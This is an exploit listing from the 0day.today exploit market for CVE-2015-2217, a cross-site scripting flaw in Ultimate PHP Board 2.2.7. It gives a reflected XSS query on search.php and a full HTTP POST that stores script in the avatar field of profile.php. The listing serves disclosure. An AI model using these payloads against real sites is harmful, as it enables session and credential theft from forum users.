[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Ultimate PHP Board (UPB) 2.2.7 Cross Site Scripting Vulnerability

Author
ZeQ3uL
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-23367
Category
web applications
Date add
07-03-2015
CVE
CVE-2015-2217
Platform
php
# Exploit Title   : Ultimate PHP Board (UPB) 2.2.7 Cross Site Scripting Vulnerability
# CVE        : CVE-2015-2217
# Date            : 4 March 2015
# Exploit Author  : CWH Underground
# Discovered By    : ZeQ3uL
# Site            : www.2600.in.th
# Vendor Homepage : http://www.myupb.com
# Software Link   : http://downloads.sourceforge.net/project/textmb/UPB/UPB%202.2.7/upb2.2.7.zip
# Version         : 2.2.7

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O .. CWH Underground ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /       
  / XXXXXX /
 (________(         
  `------'
  
####################
SOFTWARE DESCRIPTION
####################

Ultimate PHP Board is completely text based making it easy for anybody who has access to PHP can run a message board of their own without the need for MySQL.
  
####################################
DESCRIPTION FOR CROSS SITE SCRIPTING
####################################

myUPB is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. 
This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

myUPB 2.2.7 is vulnerable; other versions may also be affected.

####################
VULNERABILITY DETAIL
####################

1. Reflect Cross Site Scripting (search.php)
POC: 
/search.php?q='><script>alert(1)</script>
    
2. Stored Cross Site Scripting (profile.php)  
POC:
POST /upb/profile.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: th-th,th;q=0.8,en-us;q=0.6,en-gb;q=0.4,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://localhost/upb/profile.php
Cookie: timezone=0; lastvisit=1425552811; user_env=test; uniquekey_env=8806b913721aaf992f09134c89031d58; power_env=1; id_env=2; PHPSESSID=5jjiir5d83mbqh2s7da0gckd97
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------287611866431947
Content-Length: 716
-----------------------------287611866431947
Content-Disposition: form-data; name="u_email"
t@t.com
-----------------------------287611866431947
Content-Disposition: form-data; name="u_loca"
th
-----------------------------287611866431947
Content-Disposition: form-data; name="avatar"
images/avatars/chic.jpg'><script>alert("hacked");</script>
-----------------------------287611866431947
Content-Disposition: form-data; name="u_site"
http://
-----------------------------287611866431947
Content-Disposition: form-data; name="u_timezone"
0
-----------------------------287611866431947
Content-Disposition: form-data; name="u_edit"
Submit
-----------------------------287611866431947--

################################################################################################################
 Greetz      : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2
###############################################################################################################

#  0day.today [2024-09-28]  #